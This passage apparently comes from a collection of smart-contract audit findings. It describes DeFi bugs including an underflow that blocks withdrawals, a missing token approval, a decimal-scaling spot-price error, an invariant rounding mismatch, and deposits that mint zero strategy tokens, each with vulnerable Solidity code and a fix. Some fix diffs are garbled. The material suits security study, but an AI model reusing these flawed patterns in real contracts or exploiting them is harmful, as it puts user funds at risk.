amount.mulWadUp(getExchangeFeeWad());\\n}\\n```\\n -PerpDepository.netAssetDeposits variable can prevent users from withdrawing with underflow errorчmediumчPerpDepository.netAssetDeposits variable can prevent users from withdrawing with underflow error\\n```\\n    function _depositAsset(uint256 amount) private {\\n        netAssetDeposits += amount;\\n\\n\\n        IERC20(assetToken).approve(address(vault), amount);\\n        vault.deposit(assetToken, amount);\\n    }\\n```\\n\\n```\\n    function _withdrawAsset(uint256 amount, address to) private {\\n        if (amount > netAssetDeposits) {\\n            revert InsufficientAssetDeposits(netAssetDeposits, amount);\\n        }\\n        netAssetDeposits -= amount;\\n\\n\\n        vault.withdraw(address(assetToken), amount);\\n        IERC20(assetToken).transfer(to, amount);\\n    }\\n```\\n\\nThe problem here is that when user deposits X assets, then he receives Y UXD tokens. And when later he redeems his Y UXD tokens he can receive more or less than X assets. This can lead to a situation where the netAssetDeposits variable would be set to a negative value, which will revert the tx.\\nExample. 1.User deposits 1 WETH when it costs 1200$. As result 1200 UXD tokens were minted and netAssetDeposits was set to 1. 2.Price of WETH has decreased and now it costs 1100. 3.User redeems his 1200 UXD tokens and receives from perp protocol 1200/1100=1.09 WETH. But because netAssetDeposits is 1, then transaction will revert inside `_withdrawAsset` function with underflow error.чAs you don't use this variable anywhere else, you can remove it. 
Otherwise you need to have 2 variables instead: totalDeposited and totalWithdrawn.чUser can't redeem all his UXD tokens.ч```\\n function _depositAsset(uint256 amount) private {\\n netAssetDeposits += amount;\\n\\n\\n IERC20(assetToken).approve(address(vault), amount);\\n vault.deposit(assetToken, amount);\\n }\\n```\\n -ERC5095 has not approved MarketPlace to spend tokens in ERC5095чmediumчERC5095 requires approving MarketPlace to spend the tokens in ERC5095 before calling MarketPlace.sellUnderlying/sellPrincipalToken\\nMarketPlace.sellUnderlying/sellPrincipalToken will call transferFrom to send tokens from msg.sender to pool, which requires msg.sender to approve MarketPlace. However, before calling MarketPlace.sellUnderlying/sellPrincipalToken in ERC5095, there is no approval for MarketPlace to spend the tokens in ERC5095, which causes functions such as ERC5095.deposit/mint/withdraw/redeem functions fail, i.e. users cannot sell tokens through ERC5095.\\n```\\n function sellUnderlying(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Get the number of PTs received for selling `a` underlying tokens\\n uint128 expected = pool.sellBasePreview(a);\\n\\n // Verify slippage does not exceed the one set by the user\\n if (expected < s) {\\n revert Exception(16, expected, 0, address(0), address(0));\\n }\\n\\n // Transfer the underlying tokens to the pool\\n Safe.transferFrom(IERC20(pool.base()), msg.sender, address(pool), a);\\n// rest of code\\n function sellPrincipalToken(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Preview amount of underlying received by selling `a` PTs\\n uint256 expected = pool.sellFYTokenPreview(a);\\n\\n // Verify that the amount needed does not exceed the slippage parameter\\n if (expected < s) {\\n revert 
Exception(16, expected, s, address(0), address(0));\\n }\\n\\n // Transfer the principal tokens to the pool\\n Safe.transferFrom(\\n IERC20(address(pool.fyToken())),\\n msg.sender,\\n address(pool),\\n a\\n );\\n```\\n\\nIn the test file, `vm.startPrank(address(token))` is used and approves the MarketPlace, which cannot be done in the mainnet\\n```\\n vm.startPrank(address(token));\\n IERC20(Contracts.USDC).approve(address(marketplace), type(uint256).max);\\n IERC20(Contracts.YIELD_TOKEN).approve(\\n address(marketplace),\\n type(uint256).max\\n );\\n```\\nчApprove MarketPlace to spend tokens in ERC5095 in ERC5095.setPool.\\n```\\n function setPool(address p)\\n external\\n authorized(marketplace)\\n returns (bool)\\n {\\n pool = p.fyToken();\\n// Add the line below\\n Safe.approve(IERC20(underlying), marketplace, type(uint256).max);\\n// Add the line below\\n Safe.approve(IERC20(p.), marketplace, type(uint256).max);\\n\\n return true;\\n }\\n\\n pool = address(0);\\n }\\n```\\nчIt makes functions such as ERC5095.deposit/mint/withdraw/redeem functions fail, i.e. 
users cannot sell tokens through ERC5095.ч```\\n function sellUnderlying(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Get the number of PTs received for selling `a` underlying tokens\\n uint128 expected = pool.sellBasePreview(a);\\n\\n // Verify slippage does not exceed the one set by the user\\n if (expected < s) {\\n revert Exception(16, expected, 0, address(0), address(0));\\n }\\n\\n // Transfer the underlying tokens to the pool\\n Safe.transferFrom(IERC20(pool.base()), msg.sender, address(pool), a);\\n// rest of code\\n function sellPrincipalToken(\\n address u,\\n uint256 m,\\n uint128 a,\\n uint128 s\\n ) external returns (uint128) {\\n // Get the pool for the market\\n IPool pool = IPool(pools[u][m]);\\n\\n // Preview amount of underlying received by selling `a` PTs\\n uint256 expected = pool.sellFYTokenPreview(a);\\n\\n // Verify that the amount needed does not exceed the slippage parameter\\n if (expected < s) {\\n revert Exception(16, expected, s, address(0), address(0));\\n }\\n\\n // Transfer the principal tokens to the pool\\n Safe.transferFrom(\\n IERC20(address(pool.fyToken())),\\n msg.sender,\\n address(pool),\\n a\\n );\\n```\\n -Two token vault will be broken if it comprises tokens with different decimalsчhighчA two token vault that comprises tokens with different decimals will have many of its key functions broken. 
For instance, rewards cannot be reinvested and vault cannot be settled.\\nThe `Stable2TokenOracleMath._getSpotPrice` function is used to compute the spot price of two tokens.\\n```\\nFile: Stable2TokenOracleMath.sol\\nlibrary Stable2TokenOracleMath {\\n using TypeConvert for int256;\\n using Stable2TokenOracleMath for StableOracleContext;\\n\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX, \\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n\\nTwo tokens (USDC and DAI) with different decimals will be used below to illustrate the 
issue:\\nUSDC/DAI Spot Price\\nAssume that the primary token is DAI (18 decimals) and the secondary token is USDC (6 decimals). As such, the scaling factors would be as follows. The token rate is ignored and set to 1 for simplicity.\\nPrimary Token (DAI)'s scaling factor = 1e18\\n`scaling factor = FixedPoint.ONE (1e18) * decimals difference to reach 18 decimals (1e0) * token rate (1)\\nscaling factor = 1e18`\\nSecondary Token (USDC)'s scaling factor = 1e30\\n`scaling factor = FixedPoint.ONE (1e18) * decimals difference to reach 18 decimals (1e12) * token rate (1)\\nscaling factor = 1e18 * 1e12 = 1e30`\\nAssume that the `primaryBalance` is 100 DAI (100e18), and the `secondaryBalance` is 100 USDC (100e6). Line 25 - 28 of the `_getSpotPrice` function will normalize the tokens balances to 18 decimals as follows:\\n`scaledPrimaryBalance` will be 100e18 (It remains the same as no scaling is needed because DAI is already denominated in 18 decimals)\\n`scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\n`scaledPrimaryBalance` = 100e18 * 1e18 / 1e18\\n`scaledPrimaryBalance` = 100e18`\\n`scaledSecondaryBalance` will upscale to 100e18\\n`scaledSecondaryBalance` = `scaledSecondaryBalance` * poolContext.primaryScaleFactor / BalancerConstants.BALANCER_PRECISION;\\n`scaledSecondaryBalance` = 100e6 * 1e30 / 1e18\\n`scaledSecondaryBalance` = 100e18\\nThe `StableMath._calcSpotPrice` function at Line 39 returns the spot price of Y/X. In this example, `balanceX` is DAI, and `balanceY` is USDC. Thus, the spot price will be USDC/DAI. This means the amount of USDC I will get for each DAI.\\nWithin Balancer, all stable math calculations within the Balancer's pools are performed in `1e18`. With both the primary and secondary balances normalized to 18 decimals, they can be safely passed to the `StableMath._calculateInvariant` and `StableMath._calcSpotPrice` functions to compute the spot price. 
Assuming that the price of USDC and DAI is perfectly symmetric (1 DAI can be exchanged for exactly 1 USDC, and vice versa), the spot price returned from the `StableMath._calcSpotPrice` will be `1e18`. Note that the spot price returned by the `StableMath._calcSpotPrice` function will be denominated in 18 decimals.\\nIn Line 47-50 within the `Stable2TokenOracleMath._getSpotPrice` function, it attempts to downscale the spot price to normalize it back to the original decimals and token rate (e.g. stETH back to wstETH) of the token.\\nThe `scaleFactor` at Line 47 will be evaluated as follows:\\n```\\nscaleFactor = poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor\\nscaleFactor = 1e30 * 1e18 / 1e18\\nscaleFactor = 1e30\\n```\\n\\nFinally, the spot price will be scaled in reverse order and it will be evaluated to `1e6` as shown below:\\n```\\nspotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\nspotPrice = 1e18 * 1e18 / 1e30\\nspotPrice = 1e6\\n```\\n\\nDAI/USDC Spot Price\\nIf it is the opposite where the primary token is USDC (6 decimals) and the secondary token is DAI (18 decimals), the calculation of the spot price will be as follows:\\nThe `scaleFactor` at Line 47 will be evaluated to as follows:\\n```\\nscaleFactor = poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor\\nscaleFactor = 1e18 * 1e18 / 1e30\\nscaleFactor = 1e6\\n```\\n\\nFinally, the spot price will be scaled in reverse order and it will be evaluated to `1e30` as shown below:\\n```\\nspotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\nspotPrice = 1e18 * 1e18 / 1e6\\nspotPrice = 1e30\\n```\\n\\nNote about the spot price\\nAssuming that the spot price of USDC and DAI is 1:1. As shown above, if the decimals of two tokens are not the same, the final spot price will end up either 1e6 (USDC/DAI) or 1e30 (DAI/USDC). 
However, if the decimals of two tokens (e.g. wstETH and WETH) are the same, this issue stays hidden as the `scaleFactor` in Line 47 will always be 1e18 as both `secondaryScaleFactor` and `primaryScaleFactor` cancel out each other.\\nIt was observed that the spot price returned from the `Stable2TokenOracleMath._getSpotPrice` function is being compared with the oracle price from the `TwoTokenPoolUtils._getOraclePairPrice` function to determine if the pool has been manipulated within many functions.\\n```\\nuint256 oraclePrice = poolContext._getOraclePairPrice(strategyContext.tradingModule);\\n```\\n\\nBased on the implementation of the `TwoTokenPoolUtils._getOraclePairPrice` function , the `oraclePrice` returned by this function is always denominated in 18 decimals regardless of the decimals of the underlying tokens. For instance, assume the spot price of USDC (6 decimals) and DAI (18 decimals) is 1:1. The spot price returned by this oracle function for USDC/DAI will be `1e18` and DAI/USDC will be `1e18`.\\nIn many functions, the spot price returned from the `Stable2TokenOracleMath._getSpotPrice` function is compared with the oracle price via the `Stable2TokenOracleMath._checkPriceLimit`. Following is one such example. The `oraclePrice` will be `1e18`, while the `spotPrice` will be either `1e6` or `1e30` in our example. 
This will cause the `_checkPriceLimit` to always revert because of the large discrepancy between the two prices.\\n```\\nFile: Stable2TokenOracleMath.sol\\n function _getMinExitAmounts(\\n StableOracleContext calldata oracleContext,\\n TwoTokenPoolContext calldata poolContext,\\n StrategyContext calldata strategyContext,\\n uint256 oraclePrice,\\n uint256 bptAmount\\n ) internal view returns (uint256 minPrimary, uint256 minSecondary) {\\n // Oracle price is always specified in terms of primary, so tokenIndex == 0 for primary\\n // Validate the spot price to make sure the pool is not being manipulated\\n uint256 spotPrice = _getSpotPrice({\\n oracleContext: oracleContext,\\n poolContext: poolContext,\\n primaryBalance: poolContext.primaryBalance,\\n secondaryBalance: poolContext.secondaryBalance,\\n tokenIndex: 0\\n });\\n _checkPriceLimit(strategyContext, oraclePrice, spotPrice);\\n```\\n\\nOther affected functions include the following:\\nStable2TokenOracleMath._validateSpotPriceAndPairPrice\\nStable2TokenOracleMath._getTimeWeightedPrimaryBalanceчIssue Two token vault will be broken if it comprises tokens with different decimals\\nWithin the `Stable2TokenOracleMath._getSpotPrice`, normalize the spot price back to 1e18 before returning the result. This ensures that it can be compared with the oracle price, which is denominated in 1e18 precision.\\nThis has been implemented in the spot price function (Boosted3TokenPoolUtils._getSpotPriceWithInvariant) of another pool (Boosted3Token). However, it was not consistently applied in `TwoTokenPool`.чA vault supporting tokens with two different decimals will have many of its key functions will be broken as the `_checkPriceLimit` will always revert. For instance, rewards cannot be reinvested and vaults cannot be settled since they rely on the `_checkPriceLimit` function.\\nIf the reward cannot be reinvested, the strategy tokens held by the users will not appreciate. 
If the vault cannot be settled, the vault debt cannot be repaid to Notional and the gain cannot be realized. Loss of assets for both users and Notionalч```\\nFile: Stable2TokenOracleMath.sol\\nlibrary Stable2TokenOracleMath {\\n using TypeConvert for int256;\\n using Stable2TokenOracleMath for StableOracleContext;\\n\\n function _getSpotPrice(\\n StableOracleContext memory oracleContext, \\n TwoTokenPoolContext memory poolContext, \\n uint256 primaryBalance,\\n uint256 secondaryBalance,\\n uint256 tokenIndex\\n ) internal view returns (uint256 spotPrice) {\\n require(tokenIndex < 2); /// @dev invalid token index\\n\\n /// Apply scale factors\\n uint256 scaledPrimaryBalance = primaryBalance * poolContext.primaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n uint256 scaledSecondaryBalance = secondaryBalance * poolContext.secondaryScaleFactor \\n / BalancerConstants.BALANCER_PRECISION;\\n\\n /// @notice poolContext balances are always in BALANCER_PRECISION (1e18)\\n (uint256 balanceX, uint256 balanceY) = tokenIndex == 0 ?\\n (scaledPrimaryBalance, scaledSecondaryBalance) :\\n (scaledSecondaryBalance, scaledPrimaryBalance);\\n\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, StableMath._balances(balanceX, balanceY), true // round up\\n );\\n\\n spotPrice = StableMath._calcSpotPrice({\\n amplificationParameter: oracleContext.ampParam,\\n invariant: invariant,\\n balanceX: balanceX, \\n balanceY: balanceY\\n });\\n\\n /// Apply secondary scale factor in reverse\\n uint256 scaleFactor = tokenIndex == 0 ?\\n poolContext.secondaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.primaryScaleFactor :\\n poolContext.primaryScaleFactor * BalancerConstants.BALANCER_PRECISION / poolContext.secondaryScaleFactor;\\n spotPrice = spotPrice * BalancerConstants.BALANCER_PRECISION / scaleFactor;\\n }\\n```\\n -Rounding differences when computing the invariantчhighчThe invariant used within Boosted3Token vault to compute the 
spot price is not aligned with the Balancer's ComposableBoostedPool due to rounding differences. The spot price is used to verify if the pool has been manipulated before executing certain key vault actions (e.g. settle vault, reinvest rewards). In the worst-case scenario, it might potentially fail to detect the pool has been manipulated as the spot price computed might be inaccurate.\\nThe Boosted3Token leverage vault relies on the old version of the `StableMath._calculateInvariant` that allows the caller to specify if the computation should round up or down via the `roundUp` parameter.\\n```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n 
Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n\\nWithin the `Boosted3TokenPoolUtils._getSpotPrice` and `Boosted3TokenPoolUtils._getValidatedPoolData` functions, the `StableMath._calculateInvariant` is computed rounding up.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _getSpotPrice(\\n ThreeTokenPoolContext memory poolContext, \\n BoostedOracleContext memory oracleContext,\\n uint8 tokenIndex\\n ) internal pure returns (uint256 spotPrice) {\\n..SNIP..\\n uint256[] memory balances = _getScaledBalances(poolContext);\\n uint256 invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, balances, true // roundUp = true\\n );\\n```\\n\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _getValidatedPoolData(\\n ThreeTokenPoolContext memory poolContext,\\n BoostedOracleContext memory oracleContext,\\n StrategyContext memory strategyContext\\n ) internal view returns (uint256 virtualSupply, uint256[] memory balances, uint256 invariant) {\\n (virtualSupply, balances) =\\n _getVirtualSupplyAndBalances(poolContext, oracleContext);\\n\\n // Get the current and new invariants. 
Since we need a bigger new invariant, we round the current one up.\\n invariant = StableMath._calculateInvariant(\\n oracleContext.ampParam, balances, true // roundUp = true\\n );\\n```\\n\\nHowever, Balancer has since migrated its Boosted3Token pool from the legacy BoostedPool structure to a new ComposableBoostedPool contract.\\nThe new ComposableBoostedPool contract uses a newer version of the StableMath library where the `StableMath._calculateInvariant` function always rounds down.\\n```\\n function _calculateInvariant(uint256 amplificationParameter, uint256[] memory balances)\\n internal\\n pure\\n returns (uint256)\\n {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n **********************************************************************************************/\\n\\n // Always round down, to match Vyper's arithmetic (which always truncates).\\n\\n uint256 sum = 0; // S in the Curve version\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n ..SNIP..\\n```\\n\\nThus, Notional round up when calculating the invariant while Balancer's ComposableBoostedPool round down when calculating the invariant. This inconsistency will result in a different invariantчTo avoid any discrepancy in the result, ensure that the StableMath library used by Balancer's ComposableBoostedPool and Notional's Boosted3Token leverage vault are aligned, and the implementation of the StableMath functions is the same between them.чThe invariant is used to compute the spot price to verify if the pool has been manipulated before executing certain key vault actions (e.g. settle vault, reinvest rewards). 
If the inputted invariant is inaccurate, the spot price computed might not be accurate and might not match the actual spot price of the Balancer Pool. In the worst-case scenario, it might potentially fail to detect the pool has been manipulated and the trade proceeds to execute against the manipulated pool leading to a loss of assets.ч```\\nFile: StableMath.sol\\n function _calculateInvariant(\\n uint256 amplificationParameter,\\n uint256[] memory balances,\\n bool roundUp\\n ) internal pure returns (uint256) {\\n /**********************************************************************************************\\n // invariant //\\n // D = invariant D^(n+1) //\\n // A = amplification coefficient A n^n S + D = A D n^n + ----------- //\\n // S = sum of balances n^n P //\\n // P = product of balances //\\n // n = number of tokens //\\n *********x************************************************************************************/\\n\\n unchecked {\\n // We support rounding up or down.\\n uint256 sum = 0;\\n uint256 numTokens = balances.length;\\n for (uint256 i = 0; i < numTokens; i++) {\\n sum = sum.add(balances[i]);\\n }\\n if (sum == 0) {\\n return 0;\\n }\\n\\n uint256 prevInvariant = 0;\\n uint256 invariant = sum;\\n uint256 ampTimesTotal = amplificationParameter * numTokens;\\n\\n for (uint256 i = 0; i < 255; i++) {\\n uint256 P_D = balances[0] * numTokens;\\n for (uint256 j = 1; j < numTokens; j++) {\\n P_D = Math.div(Math.mul(Math.mul(P_D, balances[j]), numTokens), invariant, roundUp);\\n }\\n prevInvariant = invariant;\\n invariant = Math.div(\\n Math.mul(Math.mul(numTokens, invariant), invariant).add(\\n Math.div(Math.mul(Math.mul(ampTimesTotal, sum), P_D), _AMP_PRECISION, roundUp)\\n ),\\n Math.mul(numTokens + 1, invariant).add(\\n // No need to use checked arithmetic for the amp precision, the amp is guaranteed to be at least 1\\n Math.div(Math.mul(ampTimesTotal - _AMP_PRECISION, P_D), _AMP_PRECISION, !roundUp)\\n ),\\n roundUp\\n );\\n\\n if (invariant > 
prevInvariant) {\\n if (invariant - prevInvariant <= 1) {\\n return invariant;\\n }\\n } else if (prevInvariant - invariant <= 1) {\\n return invariant;\\n }\\n }\\n }\\n\\n revert CalculationDidNotConverge();\\n }\\n```\\n -Users deposit assets to the vault but receives no strategy token in returnчhighчDue to a rounding error in Solidity, it is possible that a user deposits assets to the vault, but receives no strategy token in return due to issues in the following functions:\\nStrategyUtils._convertBPTClaimToStrategyTokens\\nBoosted3TokenPoolUtils._deposit\\nTwoTokenPoolUtils._deposit\\nThis affects both the TwoToken and Boosted3Token vaults\\n```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n\\nWithin the `StrategyUtils._convertBPTClaimToStrategyTokens` function, it was observed that the numerator precision (1e8) is much smaller than the denominator precision (1e18).\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts BPT to strategy tokens\\n function _convertBPTClaimToStrategyTokens(StrategyContext memory context, uint256 bptClaim)\\n internal pure returns (uint256 strategyTokenAmount) {\\n if (context.vaultState.totalBPTHeld == 0) {\\n // Strategy tokens are in 8 decimal precision, BPT is in 18. 
Scale the minted amount down.\\n return (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / \\n BalancerConstants.BALANCER_PRECISION;\\n }\\n\\n // BPT held in maturity is calculated before the new BPT tokens are minted, so this calculation\\n // is the tokens minted that will give the account a corresponding share of the new bpt balance held.\\n // The precision here will be the same as strategy token supply.\\n strategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\n }\\n```\\n\\nAs a result, the `StrategyUtils._convertBPTClaimToStrategyTokens` function might return zero strategy tokens under the following two conditions:\\nIf the `totalBPTHeld` is zero (First Deposit)\\nIf the `totalBPTHeld` is zero, the code at Line 31 will be executed, and the following formula is used:\\n```\\nstrategyTokenAmount = (bptClaim * uint256(Constants.INTERNAL_TOKEN_PRECISION)) / BalancerConstants.BALANCER_PRECISION;\\nstrategyTokenAmount = (bptClaim * 1e8) / 1e18\\nstrategyTokenAmount = ((10 ** 10 - 1) * 1e8) / 1e18 = 0\\n```\\n\\nDuring the first deposit, if the user deposits less than 1e10 BPT, Solidity will round down and `strategyTokenAmount` will be zero.\\nIf the `totalBPTHeld` is larger than zero (Subsequently Deposits)\\nIf the `totalBPTHeld` is larger than zero, the code at Line 38 will be executed, and the following formula is used:\\n```\\nstrategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\nstrategyTokenAmount = (bptClaim * (x * 1e8))/ (y * 1e18)\\n```\\n\\nIf the numerator is less than the denominator, the `strategyTokenAmount` will be zero.\\nTherefore, it is possible that the users deposited their minted BPT to the vault, but received zero strategy tokens in return.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _deposit(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext 
memory stakingContext,\\n BoostedOracleContext memory oracleContext,\\n uint256 deposit,\\n uint256 minBPT\\n ) internal returns (uint256 strategyTokensMinted) {\\n uint256 bptMinted = poolContext._joinPoolAndStake({\\n strategyContext: strategyContext,\\n stakingContext: stakingContext,\\n oracleContext: oracleContext,\\n deposit: deposit,\\n minBPT: minBPT\\n });\\n\\n strategyTokensMinted = strategyContext._convertBPTClaimToStrategyTokens(bptMinted);\\n\\n strategyContext.vaultState.totalBPTHeld += bptMinted;\\n // Update global supply count\\n strategyContext.vaultState.totalStrategyTokenGlobal += strategyTokensMinted.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nProof-of-Concept\\nAssume that Alice is the first depositor, and she forwarded 10000 BPT. During the first mint, the strategy token will be minted in a 1:1 ratio. Therefore, Alice will receive 10000 strategy tokens in return. At this point in time, `totalStrategyTokenGlobal` = 10000 strategy tokens and `totalBPTHeld` is 10000 BPT.\\nWhen Bob deposits to the vault after Alice, he will be subjected to the following formula:\\n```\\nstrategyTokenAmount = (bptClaim * context.vaultState.totalStrategyTokenGlobal) / context.vaultState.totalBPTHeld;\\nstrategyTokenAmount = (bptClaim * (10000 * 1e8))/ (10000 * 1e18)\\nstrategyTokenAmount = (bptClaim * (1e12))/ (1e22)\\n```\\n\\nIf Bob deposits less than 1e10 BPT, Solidity will round down and `strategyTokenAmount` will be zero. Bob will receive no strategy token in return for his BPT.\\nAnother side effect of this issue is that if Alice withdraws all her strategy tokens, she will get back all her 10000 BPT plus the BPT that Bob deposited earlier.чConsider reverting if zero strategy token is minted. This check has been implemented in many well-known vault designs as this is a commonly known issue (e.g. 
Solmate)\\n```\\nfunction _deposit(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n BoostedOracleContext memory oracleContext,\\n uint256 deposit,\\n uint256 minBPT\\n) internal returns (uint256 strategyTokensMinted) {\\n uint256 bptMinted = poolContext._joinPoolAndStake({\\n strategyContext: strategyContext,\\n stakingContext: stakingContext,\\n oracleContext: oracleContext,\\n deposit: deposit,\\n minBPT: minBPT\\n });\\n\\n strategyTokensMinted = strategyContext._convertBPTClaimToStrategyTokens(bptMinted);\\n// Add the line below\\n require(strategyTokensMinted != 0, \"zero strategy token minted\"); \\n\\n strategyContext.vaultState.totalBPTHeld // Add the line below\\n= bptMinted;\\n // Update global supply count\\n strategyContext.vaultState.totalStrategyTokenGlobal // Add the line below\\n= strategyTokensMinted.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n}\\n```\\nчLoss of assets for the users as they deposited their assets but receive zero strategy tokens in return.ч```\\nint256 internal constant INTERNAL_TOKEN_PRECISION = 1e8;\\nuint256 internal constant BALANCER_PRECISION = 1e18;\\n```\\n -Vault's `totalStrategyTokenGlobal` will not be in syncчhighчThe `strategyContext.vaultState.totalStrategyTokenGlobal` variable that tracks the number of strategy tokens held in the vault will not be in sync and will cause accounting issues within the vault.\\nThis affects both the TwoToken and Boosted3Token vaults\\nThe `StrategyUtils._convertStrategyTokensToBPTClaim` function might return zero if a small number of `strategyTokenAmount` is passed into the function. 
If `(strategyTokenAmount * context.vaultState.totalBPTHeld)` is smaller than `context.vaultState.totalStrategyTokenGlobal`, the `bptClaim` will be zero.\\n```\\nFile: StrategyUtils.sol\\n /// @notice Converts strategy tokens to BPT\\n function _convertStrategyTokensToBPTClaim(StrategyContext memory context, uint256 strategyTokenAmount)\\n internal pure returns (uint256 bptClaim) {\\n require(strategyTokenAmount <= context.vaultState.totalStrategyTokenGlobal);\\n if (context.vaultState.totalStrategyTokenGlobal > 0) {\\n bptClaim = (strategyTokenAmount * context.vaultState.totalBPTHeld) / context.vaultState.totalStrategyTokenGlobal;\\n }\\n }\\n```\\n\\nIn Line 441 of the `Boosted3TokenPoolUtils._redeem` function below, if `bptClaim` is zero, it will return zero and exit the function immediately.\\nIf a small number of `strategyTokens` is passed into the `_redeem` function and the `bptClaim` ends up as zero, the caller of the `_redeem` function will assume that all the `strategyTokens` have been redeemed.\\n```\\nFile: Boosted3TokenPoolUtils.sol\\n function _redeem(\\n ThreeTokenPoolContext memory poolContext,\\n StrategyContext memory strategyContext,\\n AuraStakingContext memory stakingContext,\\n uint256 strategyTokens,\\n uint256 minPrimary\\n ) internal returns (uint256 finalPrimaryBalance) {\\n uint256 bptClaim = strategyContext._convertStrategyTokensToBPTClaim(strategyTokens);\\n\\n if (bptClaim == 0) return 0;\\n\\n finalPrimaryBalance = _unstakeAndExitPool({\\n stakingContext: stakingContext,\\n poolContext: poolContext,\\n bptClaim: bptClaim,\\n minPrimary: minPrimary\\n });\\n\\n strategyContext.vaultState.totalBPTHeld -= bptClaim;\\n strategyContext.vaultState.totalStrategyTokenGlobal -= strategyTokens.toUint80();\\n strategyContext.vaultState.setStrategyVaultState(); \\n }\\n```\\n\\nThe following function shows an example of the caller of the `_redeem` function at Line 171 below accepting the zero value as it does not revert when the zero 